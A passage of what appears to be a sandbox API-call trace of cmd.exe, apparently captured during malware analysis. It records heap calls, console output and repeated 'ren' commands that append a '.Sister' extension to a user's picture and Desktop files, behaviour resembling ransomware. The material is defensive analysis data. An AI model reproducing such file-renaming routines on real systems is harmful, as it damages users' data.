_BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0293.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.021] GetFileType (hFile=0x50) returned 0x2 [0293.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.021] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.022] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0293.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.029] GetFileType (hFile=0x50) returned 0x2 [0293.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.029] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0293.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.029] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cfaab0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cfaab0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0293.029] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.bat\" ") returned 50 [0293.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.030] GetFileType (hFile=0x50) returned 0x2 [0293.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.030] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0293.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.030] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0293.030] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0293.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.030] GetFileType (hFile=0x50) returned 0x2 [0293.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.030] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0293.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.031] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0293.036] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.039] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.039] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.039] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.039] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.039] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.039] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.039] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.039] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.039] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.039] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.039] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.039] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.039] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.039] ??_V@YAXPEAX@Z () returned 0x1 [0293.039] GetProcessHeap () returned 0x21ed8c70000 [0293.039] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d6c690 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c690, Size=0x74) returned 0x21ed8d67330 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67330) returned 0x74 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed9379780 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d6c3f0 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c3f0, Size=0x74) returned 0x21ed8d670b0 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d670b0) returned 0x74 [0293.040] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.040] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.040] GetProcessHeap () returned 0x21ed8c70000 [0293.040] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7c9a0 [0293.041] GetProcessHeap () returned 0x21ed8c70000 [0293.041] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5d9b0 [0293.041] _wcsicmp (_String1="E8sv92vO_xVbOO.jpg", _String2=".") returned 55 [0293.041] _wcsicmp (_String1="E8sv92vO_xVbOO.jpg", _String2="..") returned 55 [0293.041] GetFileAttributesW (lpFileName="E8sv92vO_xVbOO.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg")) returned 0x20 [0293.041] GetProcessHeap () returned 0x21ed8c70000 [0293.041] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cfac90 [0293.042] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cfaca0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.043] SetErrorMode (uMode=0x0) returned 0x0 [0293.043] SetErrorMode (uMode=0x1) returned 0x0 [0293.043] GetFullPathNameW (in: lpFileName="E8sv92vO_xVbOO.jpg", nBufferLength=0x7fe7, lpBuffer=0x21ed983fb00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg", lpFilePart=0xa6cf4fd660*="E8sv92vO_xVbOO.jpg") returned 0x2b [0293.043] SetErrorMode (uMode=0x0) returned 0x1 [0293.043] GetProcessHeap () returned 0x21ed8c70000 [0293.043] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cb10 [0293.043] _wcsicmp (_String1="E8sv92vO_xVbOO.jpg", _String2=".") returned 55 [0293.043] _wcsicmp (_String1="E8sv92vO_xVbOO.jpg", _String2="..") returned 55 [0293.043] GetFileAttributesW (lpFileName="E8sv92vO_xVbOO.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg")) returned 0x20 [0293.043] ??_V@YAXPEAX@Z () returned 0x1 [0293.043] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.043] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.043] malloc (_Size=0xffce) returned 0x21ed984fae0 [0293.043] ??_V@YAXPEAX@Z () returned 0x21ed984fae0 [0293.044] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg")) returned 0x20 [0293.044] malloc (_Size=0xffce) returned 0x21ed985fac0 [0293.044] ??_V@YAXPEAX@Z () returned 0x21ed985fac0 [0293.044] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5d9c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5d9c0) returned 0x21ed8c7cd00 [0293.044] malloc (_Size=0xffce) returned 0x21ed986faa0 [0293.044] ??_V@YAXPEAX@Z () returned 0x21ed986faa0 [0293.045] ??_V@YAXPEAX@Z () returned 0x1 [0293.045] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\e8sv92vo_xvboo.jpg.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0293.047] FindNextFileW (in: hFindFile=0x21ed8c7cd00, lpFindFileData=0x21ed8d5d9c0 | out: lpFindFileData=0x21ed8d5d9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe6dbc0, ftCreationTime.dwHighDateTime=0x1d5e494, ftLastAccessTime.dwLowDateTime=0x9a5b1ab0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x9a5b1ab0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="E8sv92vO_xVbOO.jpg", cAlternateFileName="")) returned 0 [0293.053] GetLastError () returned 0x12 [0293.053] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0293.053] ??_V@YAXPEAX@Z () returned 0x1 [0293.053] ??_V@YAXPEAX@Z () returned 0x1 [0293.053] ??_V@YAXPEAX@Z () returned 0x1 [0293.053] ??_V@YAXPEAX@Z () returned 0x1 [0293.053] GetProcessHeap () returned 0x21ed8c70000 [0293.053] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cd00 [0293.053] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c959a0 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c959a0) returned 0x16 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45c50, Size=0x20) returned 0x21ed8d45b30 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45b30) returned 0x20 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b2a0 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b2a0, Size=0xb2) returned 0x21ed937c230 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937c230) returned 0xb2 [0293.054] GetProcessHeap () returned 0x21ed8c70000 [0293.054] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0ac80 [0293.055] GetProcessHeap () returned 0x21ed8c70000 [0293.055] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0ac80, Size=0x30) returned 0x21ed8d0ac80 [0293.055] GetProcessHeap () returned 0x21ed8c70000 [0293.055] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0ac80) returned 0x30 [0293.055] GetProcessHeap () returned 0x21ed8c70000 [0293.055] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d0acc0 [0293.055] malloc (_Size=0x1ff9c) returned 0x21ed983fb00 [0293.055] GetProcessHeap () returned 0x21ed8c70000 [0293.055] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937bff0 [0293.055] GetProcessHeap () returned 0x21ed8c70000 [0293.055] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c0b0 [0293.055] ??_V@YAXPEAX@Z () returned 0x1 [0293.055] malloc (_Size=0x1ff9c) returned 0x21ed983fb00 [0293.056] GetProcessHeap () returned 0x21ed8c70000 [0293.056] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937ccb0 [0293.056] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed983fb00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0293.056] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca00 [0293.056] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0293.056] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca00 [0293.057] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0293.057] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0293.057] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0293.057] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0293.057] malloc (_Size=0x1ff9c) returned 0x21ed985fab0 [0293.057] ??_V@YAXPEAX@Z () returned 0x21ed985fab0 [0293.057] GetProcessHeap () returned 0x21ed8c70000 [0293.057] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d673b0 [0293.058] ??_V@YAXPEAX@Z () returned 0x1 [0293.058] ??_V@YAXPEAX@Z () returned 0x1 [0293.058] GetProcessHeap () returned 0x21ed8c70000 [0293.058] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d0acc0, Size=0x490) returned 0x21ed8d0acc0 [0293.058] GetProcessHeap () returned 0x21ed8c70000 [0293.058] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d0acc0) returned 0x490 [0293.058] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0293.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.058] GetFileType (hFile=0x50) returned 0x2 [0293.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.058] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0293.060] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.060] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0293.084] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.084] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0293.084] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0293.084] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.084] GetFileType (hFile=0x50) returned 0x2 [0293.084] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.084] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0293.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.085] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0293.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.085] GetFileType (hFile=0x50) returned 0x2 [0293.085] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.085] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.086] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d0ac90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d0ac90*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0293.086] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0293.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.086] GetFileType (hFile=0x50) returned 0x2 [0293.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.086] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0293.087] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.087] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0293.091] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0293.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.091] GetFileType (hFile=0x50) returned 0x2 [0293.091] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0293.091] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0293.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0293.091] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0293.114] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0293.115] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0293.115] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0293.115] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.115] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.116] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0293.116] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0293.116] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0293.116] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0293.116] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0293.116] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0293.116] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0293.116] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0293.116] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0293.116] ??_V@YAXPEAX@Z () returned 0x1 [0293.116] GetProcessHeap () returned 0x21ed8c70000 [0293.116] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e420 [0293.116] GetProcessHeap () returned 0x21ed8c70000 [0293.116] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e420, Size=0x130) returned 0x21ed8d62590 [0293.116] GetProcessHeap () returned 0x21ed8c70000 [0293.116] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d62590) returned 0x130 [0293.117] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.117] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.117] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.117] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.117] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed983fb00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0293.119] ??_V@YAXPEAX@Z () returned 0x1 [0293.119] GetProcessHeap () returned 0x21ed8c70000 [0293.119] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d56f60 [0293.120] GetProcessHeap () returned 0x21ed8c70000 [0293.120] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fbe0 [0293.120] GetProcessHeap () returned 0x21ed8c70000 [0293.120] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fbe0, Size=0x130) returned 0x21ed8d57820 [0293.120] GetProcessHeap () returned 0x21ed8c70000 [0293.120] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d57820) returned 0x130 [0293.120] malloc (_Size=0xffce) returned 0x21ed983fb00 [0293.120] ??_V@YAXPEAX@Z () returned 0x21ed983fb00 [0293.120] GetProcessHeap () returned 0x21ed8c70000 [0293.120] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ca00 [0293.120] GetProcessHeap () returned 0x21ed8c70000 [0293.120] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5de90 [0293.121] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.121] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.121] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0293.121] GetLastError () returned 0x2 [0293.121] GetProcessHeap () returned 0x21ed8c70000 [0293.121] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d0b160 [0293.122] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d0b170 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0293.122] SetErrorMode (uMode=0x0) returned 0x0 [0293.122] SetErrorMode (uMode=0x1) returned 0x0 [0293.122] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed983fb00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0293.122] SetErrorMode (uMode=0x0) returned 0x1 [0293.122] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0293.122] GetProcessHeap () returned 0x21ed8c70000 [0293.122] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5add0 [0293.122] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0293.122] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0293.123] GetFileAttributesW 